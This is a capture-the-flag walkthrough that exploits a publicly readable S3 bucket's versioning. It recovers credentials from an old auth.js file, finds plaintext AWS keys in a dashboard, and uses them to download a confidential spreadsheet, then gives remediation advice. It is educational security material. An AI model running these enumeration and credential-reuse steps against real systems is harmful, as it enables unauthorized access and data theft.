Leveraging S3 Bucket Versioning
A walkthrough demonstrating how S3 Bucket Versioning can lead to data exposure and exfiltration.
CTF Source: Pwned Labs
In this walkthrough, we'll discover how improper permissions to S3 Bucket Versioning can lead to unintentional data exposure and exfiltration.
Install the AWS CLI: brew install awscli (macOS) or apt install awscli (Linux).
We’re given the IP 16.171.123.169, and after finding port 443 open, we discover a login page in the browser.
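As a sketch, the open port could have been found with a quick nmap scan (flag choice is mine, not from the original walkthrough):

```shell
# Skip host discovery (-Pn) and grab service banners (-sV) on common ports
nmap -Pn -sV 16.171.123.169

# Or a faster check of just the usual web ports
nmap -Pn -p 80,443 16.171.123.169
```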
Viewing the web page source code, we find an S3 bucket.
Navigating to the root of the S3 bucket, we can see two prefixes: private and static.
Let’s try enumerating the bucket with the aws cli.
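A minimal anonymous enumeration pass might look like the following; the bucket name is a placeholder for whatever appeared in the page source, and --no-sign-request attempts unauthenticated access:

```shell
# List top-level prefixes anonymously (bucket name is a placeholder)
aws s3 ls s3://<bucket-name>/ --no-sign-request

# Recurse into the prefixes we found
aws s3 ls s3://<bucket-name>/private/ --no-sign-request
aws s3 ls s3://<bucket-name>/static/ --no-sign-request
```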
Let’s see if S3 bucket versioning has been set up.
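One way to check is with the s3api subcommands (bucket name again a placeholder):

```shell
# Check whether versioning is enabled on the bucket
aws s3api get-bucket-versioning --bucket <bucket-name> --no-sign-request

# List every object version and delete marker the bucket will show us
aws s3api list-object-versions --bucket <bucket-name> --no-sign-request
```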
We can also use curl on a bucket object to view information about versioning and delete markers. Amazon’s documentation describes the relevant response headers (such as x-amz-version-id and x-amz-delete-marker) in more detail.
In this example, I needed to replace the spaces in the xlsx file name with %20, which is called URL encoding.
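As a sketch, the space-to-%20 substitution can be scripted before handing the name to curl (the bucket URL in the commented line is a placeholder):

```shell
FILE="Business Health - Board Meeting (Confidential).xlsx"
# Replace each space with %20 (a minimal URL encoding for this file name)
ENCODED=$(printf '%s' "$FILE" | sed 's/ /%20/g')
echo "$ENCODED"
# curl -I "https://<bucket-name>.s3.amazonaws.com/private/${ENCODED}"
```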
Let’s try downloading the latest version (the one without a delete marker) of Business Health - Board Meeting (Confidential).xlsx. No dice.
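The failed attempt looked roughly like this (bucket name is a placeholder); anonymous access to the current version is refused:

```shell
# Anonymous GetObject on the current version fails with an access-denied error
aws s3 cp "s3://<bucket-name>/private/Business Health - Board Meeting (Confidential).xlsx" . \
  --no-sign-request
```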
However, there is a newer version of the file auth.js. If we try downloading the previous version, we’ll find we’re successful, and we also find credentials!
Let's read the file contents.
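Retrieving the older version uses the VersionId reported by list-object-versions; both the key path and the version ID below are placeholders:

```shell
# Download a specific (older) version of auth.js anonymously
aws s3api get-object \
  --bucket <bucket-name> \
  --key auth.js \
  --version-id <version-id> \
  auth.js --no-sign-request

# Inspect the recovered file for hard-coded credentials
cat auth.js
```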
With these credentials, we can log in to the original login page of the website. It appears to be a dashboarding app.
Poking around, we can find plaintext AWS Access Keys!
Before configuring these AWS credentials, we’ll need to know what region we’re working in. Let’s check the S3 bucket’s region using curl.
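The region check relies on the x-amz-bucket-region response header returned by a HEAD request (bucket URL is a placeholder):

```shell
# The bucket's region is reported in a response header
curl -sI "https://<bucket-name>.s3.amazonaws.com/" | grep -i x-amz-bucket-region
```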
Great! We’re working in the eu-north-1 region. Let’s set up our new AWS credentials.
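Storing the found keys under a dedicated profile and confirming the identity behind them might look like this (the profile name is my choice):

```shell
# Store the discovered keys under a separate profile rather than the default
aws configure --profile stolen
# ...enter the Access Key ID, Secret Access Key, and region eu-north-1 when prompted

# Confirm which principal the keys belong to
aws sts get-caller-identity --profile stolen
```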
Sweet! Looks like we’re the data-user. Alright, with our new profile, let’s attempt to download that xlsx file again.
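The authenticated retry is the same command as before, but signed with the new profile (bucket and profile names are placeholders):

```shell
# Retry the confidential spreadsheet with the authenticated profile
aws s3 cp "s3://<bucket-name>/private/Business Health - Board Meeting (Confidential).xlsx" . \
  --profile stolen
```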
Since I don’t have a program to open xlsx files on my Kali Linux box, I’ll transfer the file over to my Mac.
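One way to move the file over is scp (the username and host below are placeholders):

```shell
# Copy the spreadsheet to another machine over SSH
scp "Business Health - Board Meeting (Confidential).xlsx" user@<mac-ip>:~/Downloads/
```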
And here’s the flag!
So, in this CTF, we discovered an S3-hosted website. Upon enumerating the bucket, we found credentials in an old file version, used those to access a company dashboard tool, and discovered plaintext AWS Access Keys leading to the exfiltration of sensitive company data. Here are some recommended actions administrators can take to prevent this from happening.
Tighten the S3 Bucket Policy
The “Everyone” principal could perform s3:ListBucketVersions and s3:GetObjectVersion, leading to the discovery of hard-coded credentials in the file auth.js.
See below for a potential replacement policy; note that it would still allow public access to all bucket contents (see point 2).
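A sketch of a tightened policy, applied with put-bucket-policy: it grants only anonymous s3:GetObject and drops the version-listing and version-read permissions. The bucket name is a placeholder, and this still exposes all current objects, which is why point 2 matters:

```shell
aws s3api put-bucket-policy --bucket <bucket-name> --policy '{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "PublicReadCurrentObjectsOnly",
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::<bucket-name>/*"
    }
  ]
}'
```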
Eliminate S3 bucket multi-use
Using an S3 bucket for multiple purposes can lead to unintended consequences like information disclosure due to a lax or complicated bucket policy.
Since this bucket is hosting a publicly accessible website, only store files relevant to the website.
If moving data to a new location, ensure any remnants get deleted. The command below can perform this action.
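A sketch of removing a leftover noncurrent version; the key and version ID are placeholders taken from the list-object-versions output:

```shell
# Permanently remove a specific noncurrent version of an object
aws s3api delete-object \
  --bucket <bucket-name> \
  --key auth.js \
  --version-id <version-id>
```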
Ensure employees are trained and have access to a credential manager.
In this case, an employee’s AWS Access Keys were found improperly stored in their Dashboard profile.
Securely store credentials in solutions such as AWS Secrets Manager, HashiCorp Vault, or similar.